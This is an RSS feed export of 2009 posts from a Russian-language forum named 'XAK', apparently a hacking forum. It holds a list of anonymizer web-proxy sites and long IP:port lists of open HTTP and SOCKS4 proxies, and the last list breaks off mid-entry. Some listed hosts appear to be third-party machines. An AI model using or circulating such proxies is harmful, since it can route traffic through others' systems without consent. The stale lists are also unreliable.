<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://xakforum.mybb.forum/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>Форум &quot;XAK&quot;</title>
		<link>http://xakforum.mybb.forum/</link>
		<description>Форум &amp;quot;XAK&amp;quot;</description>
		<language>ru-ru</language>
		<lastBuildDate>Sat, 20 Jun 2009 15:07:10 +0400</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Картинка</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=61#p61</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: lime&quot;&gt;&amp;gt;ЮЗЕРБАР&amp;lt;&lt;/span&gt;&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://userba.ru/done/BpqLFKGtGQMrDzducAx_.png&quot; alt=&quot;http://userba.ru/done/BpqLFKGtGQMrDzducAx_.png&quot; /&gt;&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://f3.ifotki.info/org/f59f48f46f5e9eb0f35aad2eed8af22c5d788228156009.gif&quot; alt=&quot;http://f3.ifotki.info/org/f59f48f46f5e9eb0f35aad2eed8af22c5d788228156009.gif&quot; /&gt;&lt;br /&gt;&lt;span style=&quot;color: #FF0000&quot;&gt;Смотрим-&amp;gt;&amp;gt;&lt;/span&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://static.hsdn.org/infobar/240x15.gif&quot; alt=&quot;http://static.hsdn.org/infobar/240x15.gif&quot; /&gt;&lt;span style=&quot;color: #FF0000&quot;&gt;&amp;lt;&amp;lt;- это инфо о вас!&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana&quot;&gt;STEMP&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 15:07:10 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=61#p61</guid>
		</item>
		<item>
			<title>Сайты где каждый день обновляются прокси</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=60#p60</link>
			<description>&lt;p&gt;&lt;a href=&quot;http://www.kproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.kproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.645.cc/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.645.cc/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.474.cc/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.474.cc/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.anonymization.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anonymization.net/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.guardster.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.guardster.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.proxyweb.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxyweb.net/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://webwarper.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://webwarper.net/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://megaproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://megaproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://amegaproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://amegaproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.w3privacy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.w3privacy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.anonymizer.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anonymizer.ru/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.the-cloak.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.the-cloak.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://proxify.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://proxify.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.snoopblocker.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.snoopblocker.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.long999.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.long999.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.calcmaster.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.calcmaster.net/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.idzap.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.idzap.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.goproxing.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.goproxing.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.merletn.org/anonymizer&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.merletn.org/anonymizer&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.proxymouse.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxymouse.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.proxywave.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxywave.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.vtunnel.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.vtunnel.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.freeproxy.ca/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.freeproxy.ca/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.hackingtruths.org/proxy&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.hackingtruths.org/proxy&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://xanproxy.be/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://xanproxy.be/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.proxyanon.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxyanon.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.anonproxy.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anonproxy.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.proxysafe.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxysafe.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.strongproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.strongproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://surfonym.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://surfonym.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.browseatwork.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.browseatwork.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.anonymousurfing.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anonymousurfing.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.browsingwork.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.browsingwork.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.anotherproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anotherproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.proxifyme.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxifyme.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.unblockthis.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.unblockthis.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.hidingyou.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.hidingyou.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.fsurf.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.fsurf.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.proxy-surf.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxy-surf.net/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.totalupload.com/surf/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.totalupload.com/surf/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.arandomproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.arandomproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://proxynanny.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://proxynanny.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.anoniproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anoniproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://pleaseunblock.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://pleaseunblock.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.proxylord.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxylord.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.proxyindex.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxyindex.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.surf-anonymous.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.surf-anonymous.org/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.privacy-world.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.privacy-world.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.surf24h.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.surf24h.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://bywhat.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://bywhat.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://gothru.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://gothru.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.openupms.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.openupms.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.stupidschool.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.stupidschool.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.ianonymous.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.ianonymous.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://viewtheweb.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://viewtheweb.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://openblockers.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://openblockers.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://dontbestopped.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://dontbestopped.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.proxy4myspace.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxy4myspace.org/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.freedomtunnel.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.freedomtunnel.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://privatebrowse.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://privatebrowse.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://getonnow.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://getonnow.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://freemyurl.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://freemyurl.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://bypasslocks.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://bypasslocks.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.noipproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.noipproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.myinternetproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.myinternetproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.surfinstantly.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.surfinstantly.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://worldwideunblocker.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://worldwideunblocker.info/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.iproxy.eu/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.iproxy.eu/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.blairstownnj.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.blairstownnj.org/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://bypassway.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://bypassway.net/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://289.us/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://289.us/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://browsebrisk.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://browsebrisk.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://browsecrafty.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://browsecrafty.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://hidden4u.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://hidden4u.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://planetx5.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://planetx5.com&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:28:27 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=60#p60</guid>
		</item>
		<item>
			<title>anonymous</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=59#p59</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;140.247.60.123:3124&lt;br /&gt;138.246.99.249:3128&lt;br /&gt;146.57.249.98:3128&lt;br /&gt;204.56.0.138:3127&lt;br /&gt;221.130.193.14:80&lt;br /&gt;193.167.187.188:3127&lt;br /&gt;218.206.194.247:8800&lt;br /&gt;194.42.17.124:3124&lt;br /&gt;195.116.60.34:3124&lt;br /&gt;128.238.88.65:3127&lt;br /&gt;201.229.208.2:80&lt;br /&gt;218.249.35.246:808&lt;br /&gt;194.42.17.124:3127&lt;br /&gt;128.195.54.161:3124&lt;br /&gt;128.238.88.65:3124&lt;br /&gt;193.167.182.132:3127&lt;br /&gt;66.98.212.79:8888&lt;br /&gt;94.76.205.113:30003&lt;br /&gt;87.117.231.21:10201&lt;br /&gt;94.229.69.98:33333&lt;br /&gt;222.184.56.3:80&lt;br /&gt;87.117.231.22:12323&lt;br /&gt;221.11.27.110:8080&lt;br /&gt;94.229.69.97:40004&lt;br /&gt;89.207.233.9:18081&lt;br /&gt;116.11.32.210:8080&lt;br /&gt;213.92.101.3:80&lt;br /&gt;194.176.176.82:8080&lt;br /&gt;64.79.194.56:41113&lt;br /&gt;64.79.194.49:31955&lt;br /&gt;64.79.199.35:48725&lt;br /&gt;92.243.17.151:23332&lt;br /&gt;64.79.209.203:34968&lt;br /&gt;81.169.176.86:80&lt;br /&gt;61.133.196.36:80&lt;br /&gt;202.106.121.134:80&lt;br /&gt;81.174.70.140:28282&lt;br /&gt;82.204.37.210:8080&lt;br /&gt;192.41.135.218:3128&lt;br /&gt;137.226.138.154:3124&lt;br /&gt;80.6.67.111:9090&lt;br /&gt;128.232.103.201:3127&lt;br /&gt;128.232.103.203:3124&lt;br /&gt;164.41.254.1:80&lt;br /&gt;206.167.158.131:8080&lt;br /&gt;200.221.10.104:80&lt;br /&gt;194.246.124.85:80&lt;br /&gt;222.255.29.83:8888&lt;br /&gt;195.57.124.85:80&lt;br /&gt;64.79.197.36:43444&lt;br /&gt;79.99.129.51:80&lt;br /&gt;66.155.118.55:80&lt;br /&gt;64.86.28.118:19193&lt;br /&gt;202.168.193.131:80&lt;br /&gt;211.161.197.182:80&lt;br /&gt;137.56.244.38:80&lt;br /&gt;88.216.54.84:80&lt;br /&gt;209.63.57.11:80&lt;br /&gt;69.43.144.101:8000&lt;br /&gt;211.100.4.71:80&lt;br /&gt;62.144.34.205:3128&lt;br /&gt;66.155.122.112:808&lt;br /&gt;129.69.210.97:3124&lt;br /&gt;59.90.213.141:6588&lt;br /&gt;210.164.19.109:8080&lt;br /&gt;219.237.199.113:8080&lt;br /&gt;140.113.156.245:3128&lt;br /&gt;61.234.254.69:8088&lt;br /&gt;202.78.239.204:1080&lt;br /&gt;68.102.90.174:2301&lt;br /&gt;24.3.105.116:9090&lt;br /&gt;70.186.168.130:9090&lt;br /&gt;76.107.208.13:9090&lt;br /&gt;219.34.2.65:8080&lt;br /&gt;66.253.168.169:9090&lt;br /&gt;189.111.166.103:6588&lt;br /&gt;203.110.240.22:80&lt;br /&gt;66.128.38.41:8080&lt;br /&gt;38.103.164.174:9090&lt;br /&gt;207.248.228.166:80&lt;br /&gt;194.106.94.39:8080&lt;br /&gt;200.55.208.203:80&lt;br /&gt;61.91.165.29:3128&lt;br /&gt;66.128.38.41:80&lt;br /&gt;61.90.185.168:80&lt;br /&gt;125.89.73.159:80&lt;br /&gt;212.170.156.46:80&lt;br /&gt;212.123.91.61:82&lt;br /&gt;200.104.250.92:80&lt;br /&gt;80.153.156.21:1080&lt;br /&gt;81.31.157.33:6654&lt;br /&gt;76.169.103.173:9090&lt;br /&gt;69.47.165.83:9090&lt;br /&gt;194.3.18.22:80&lt;br /&gt;194.117.157.72:8647&lt;br /&gt;210.245.54.64:80&lt;br /&gt;200.215.41.202:80&lt;br /&gt;210.143.22.51:8080&lt;br /&gt;218.40.172.45:80&lt;br /&gt;218.22.177.234:8080&lt;br /&gt;68.34.1.132:9090&lt;br /&gt;99.199.237.158:9090&lt;br /&gt;65.65.219.98:29122&lt;br /&gt;194.3.18.21:80&lt;br /&gt;201.245.152.230:80&lt;br /&gt;70.86.138.210:8132&lt;br /&gt;83.138.242.16:8000&lt;br /&gt;69.120.173.183:9090&lt;br /&gt;58.20.51.207:808&lt;br /&gt;98.216.3.48:9090&lt;br /&gt;216.151.156.26:80&lt;br /&gt;94.255.180.252:80&lt;br /&gt;79.133.224.249:80&lt;br /&gt;66.209.56.218:8080&lt;br /&gt;213.171.255.2:8080&lt;br /&gt;151.79.46.58:8080&lt;br /&gt;202.83.174.14:8080&lt;br /&gt;222.255.29.84:8888&lt;br /&gt;93.188.168.68:80&lt;br /&gt;121.52.49.218:8088&lt;br /&gt;68.49.71.4:80&lt;br /&gt;194.117.157.72:22622&lt;br /&gt;68.118.147.60:9090&lt;br /&gt;82.40.108.30:9090&lt;br /&gt;194.117.157.72:24874&lt;br /&gt;75.87.189.110:9090&lt;br /&gt;82.37.169.145:9090&lt;br /&gt;193.19.82.24:3128&lt;br /&gt;194.117.157.72:19772&lt;br /&gt;194.117.157.72:18272&lt;br /&gt;76.112.150.1:9090&lt;br /&gt;75.111.224.250:9090&lt;br /&gt;68.175.47.31:9090&lt;br /&gt;82.27.35.132:9090&lt;br /&gt;60.254.13.79:80&lt;br /&gt;202.213.246.61:80&lt;br /&gt;72.190.122.130:9090&lt;br /&gt;222.41.192.146:808&lt;br /&gt;77.246.72.250:3128&lt;br /&gt;195.159.135.38:80&lt;br /&gt;210.245.80.10:8888&lt;br /&gt;174.129.225.131:80&lt;br /&gt;198.110.167.72:80&lt;br /&gt;213.154.216.55:80&lt;br /&gt;202.85.94.25:8088&lt;br /&gt;84.244.5.86:80&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: green&quot;&gt;high anonymous &lt;br /&gt;140.247.60.123:3124&lt;br /&gt;138.246.99.249:3128&lt;br /&gt;146.57.249.98:3128&lt;br /&gt;204.56.0.138:3127&lt;br /&gt;221.130.193.14:80&lt;br /&gt;193.167.187.188:3127&lt;br /&gt;218.206.194.247:8800&lt;br /&gt;194.42.17.124:3124&lt;br /&gt;195.116.60.34:3124&lt;br /&gt;128.238.88.65:3127&lt;br /&gt;201.229.208.2:80&lt;br /&gt;218.249.35.246:808&lt;br /&gt;194.42.17.124:3127&lt;br /&gt;128.195.54.161:3124&lt;br /&gt;128.238.88.65:3124&lt;br /&gt;193.167.182.132:3127&lt;br /&gt;66.98.212.79:8888&lt;br /&gt;192.41.135.218:3128&lt;br /&gt;137.226.138.154:3124&lt;br /&gt;80.6.67.111:9090&lt;br /&gt;128.232.103.201:3127&lt;br /&gt;128.232.103.203:3124&lt;br /&gt;164.41.254.1:80&lt;br /&gt;209.63.57.11:80&lt;br /&gt;62.144.34.205:3128&lt;br /&gt;66.155.122.112:808&lt;br /&gt;129.69.210.97:3124&lt;br /&gt;59.90.213.141:6588&lt;br /&gt;210.164.19.109:8080&lt;br /&gt;219.237.199.113:8080&lt;br /&gt;140.113.156.245:3128&lt;br /&gt;61.234.254.69:8088&lt;br /&gt;202.78.239.204:1080&lt;br /&gt;68.102.90.174:2301&lt;br /&gt;24.3.105.116:9090&lt;br /&gt;70.186.168.130:9090&lt;br /&gt;76.107.208.13:9090&lt;br /&gt;219.34.2.65:8080&lt;br /&gt;66.253.168.169:9090&lt;br /&gt;189.111.166.103:6588&lt;br /&gt;203.110.240.22:80&lt;br /&gt;81.31.157.33:6654&lt;br /&gt;76.169.103.173:9090&lt;br /&gt;69.47.165.83:9090&lt;br /&gt;194.3.18.22:80&lt;br /&gt;194.117.157.72:8647&lt;br /&gt;210.245.54.64:80&lt;br /&gt;200.215.41.202:80&lt;br /&gt;210.143.22.51:8080&lt;br /&gt;218.40.172.45:80&lt;br /&gt;218.22.177.234:8080&lt;br /&gt;68.34.1.132:9090&lt;br /&gt;99.199.237.158:9090&lt;br /&gt;65.65.219.98:29122&lt;br /&gt;194.3.18.21:80&lt;br /&gt;201.245.152.230:80&lt;br /&gt;70.86.138.210:8132&lt;br /&gt;83.138.242.16:8000&lt;br /&gt;69.120.173.183:9090&lt;br /&gt;58.20.51.207:808&lt;br /&gt;98.216.3.48:9090&lt;br /&gt;194.117.157.72:22622&lt;br /&gt;68.118.147.60:9090&lt;br /&gt;82.40.108.30:9090&lt;br /&gt;194.117.157.72:24874&lt;br /&gt;75.87.189.110:9090&lt;br /&gt;82.37.169.145:9090&lt;br /&gt;193.19.82.24:3128&lt;br /&gt;194.117.157.72:19772&lt;br /&gt;194.117.157.72:18272&lt;br /&gt;76.112.150.1:9090&lt;br /&gt;75.111.224.250:9090&lt;br /&gt;68.175.47.31:9090&lt;br /&gt;82.27.35.132:9090&lt;br /&gt;60.254.13.79:80&lt;br /&gt;202.213.246.61:80&lt;br /&gt;72.190.122.130:9090&lt;br /&gt;222.41.192.146:808&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:26:05 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=59#p59</guid>
		</item>
		<item>
			<title>HTTP-норм</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=58#p58</link>
			<description>&lt;p&gt;80.250.30.29:3128&lt;br /&gt;213.81.172.254:3128&lt;br /&gt;200.94.106.76:8080&lt;br /&gt;125.40.47.112:3128&lt;br /&gt;200.222.48.8:80&lt;br /&gt;122.224.171.91:3128&lt;br /&gt;200.241.95.10:3128&lt;br /&gt;119.31.250.73:8080&lt;br /&gt;218.28.58.86:3128&lt;br /&gt;213.81.172.254:3128&lt;br /&gt;200.94.106.76:8080&lt;br /&gt;125.40.47.112:3128&lt;br /&gt;200.222.48.8:80&lt;br /&gt;122.224.171.91:3128&lt;br /&gt;207.61.241.100:9090&lt;br /&gt;66.128.38.41:80&lt;br /&gt;58.176.56.189:9090&lt;br /&gt;91.121.107.117:3128&lt;br /&gt;119.31.250.73:8080&lt;br /&gt;202.88.253.138:8080&lt;br /&gt;125.240.55.130:8080&lt;br /&gt;210.17.228.190:8088&lt;br /&gt;62.129.243.66:80&lt;br /&gt;200.241.95.10:3128&lt;br /&gt;203.160.1.85:80&lt;br /&gt;203.160.1.103:80&lt;br /&gt;201.17.6.199:3128&lt;br /&gt;67.69.254.247:80&lt;br /&gt;119.31.250.73:8080&lt;br /&gt;202.88.253.138:8080&lt;br /&gt;125.240.55.130:8080&lt;br /&gt; 189.11.171.26:3128&lt;br /&gt;122.224.171.91:3128&lt;br /&gt;60.30.83.220:8080&lt;br /&gt;203.160.1.66:80&lt;br /&gt;203.160.1.103:80&lt;br /&gt;203.160.1.75:80&lt;br /&gt;203.160.1.85:80&lt;br /&gt;200.94.106.76:8080&lt;br /&gt;61.133.196.36:80&lt;br /&gt;61.133.196.40:80&lt;br /&gt;213.81.172.254:3128&lt;br /&gt;222.134.58.246:3128&lt;br /&gt;61.90.185.168:80&lt;br /&gt;119.31.250.73:8080&lt;br /&gt;222.255.28.33:3128&lt;br /&gt;218.60.146.200:80&lt;br /&gt;61.6.163.29:3128&lt;br /&gt;218.5.18.131:3128&lt;br /&gt;150.165.255.74:3128&lt;br /&gt;218.28.58.86:3128&lt;br /&gt;202.88.253.138:8080&lt;br /&gt;60.12.190.109:8088&lt;br /&gt;66.128.38.41:80&lt;br /&gt;66.128.38.41:80&lt;br /&gt;210.75.4.138:80&lt;br /&gt;60.12.227.209:3128&lt;br /&gt;78.111.34.2:8080&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:24:21 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=58#p58</guid>
		</item>
		<item>
			<title>SOCKS 4</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=57#p57</link>
			<description>&lt;p&gt;24.61.253.220:58707&lt;br /&gt;61.116.180.191:1080&lt;br /&gt;61.116.180.130:1080&lt;br /&gt;61.116.180.190:1080&lt;br /&gt;122.231.65.248:1080&lt;br /&gt;123.124.255.114:1080&lt;br /&gt;24.21.99.150:58377&lt;br /&gt;91.197.49.214:1080&lt;br /&gt;83.223.129.77:1080&lt;br /&gt;61.116.180.130:1080&lt;br /&gt;61.116.180.191:1080&lt;br /&gt;61.116.180.190:1080&lt;br /&gt;122.231.65.248:1080&lt;br /&gt;123.124.255.114:1080&lt;br /&gt;98.213.100.93:52289&lt;br /&gt;76.110.19.233:22535&lt;br /&gt;91.197.49.214:1080&lt;br /&gt;83.223.129.77:1080&lt;br /&gt;122.231.65.248:1080&lt;br /&gt;61.116.180.191:1080&lt;br /&gt;61.116.180.190:1080&lt;br /&gt;61.116.180.130:1080&lt;br /&gt;123.124.255.114:1080&lt;br /&gt;98.213.100.93:52289&lt;br /&gt;24.61.253.220:58707&lt;br /&gt;70.121.206.74:6147&lt;br /&gt;68.41.16.145:2871&lt;br /&gt;61.116.180.130:1080&lt;br /&gt;61.116.180.130:1080&lt;br /&gt;61.116.180.130:1080&lt;br /&gt;61.116.180.130:1080&lt;br /&gt;64.233.153.185:35229&lt;br /&gt;75.66.137.97:34107&lt;br /&gt;24.131.120.220:9455&lt;br /&gt;68.41.16.145:2871&lt;br /&gt;98.213.100.93:52289&lt;br /&gt;68.59.247.230:36911&lt;br /&gt;24.89.138.219:20761&lt;br /&gt;83.223.129.77:1080&lt;br /&gt;61.116.180.130:1080&lt;br /&gt;122.231.65.248:1080&lt;br /&gt;123.124.255.114:1080&lt;br /&gt;61.116.180.191:1080&lt;br /&gt;61.116.180.190:1080&lt;br /&gt;68.113.169.236:24189&lt;br /&gt;75.66.137.97:34107&lt;br /&gt;123.124.255.114:1080&lt;br 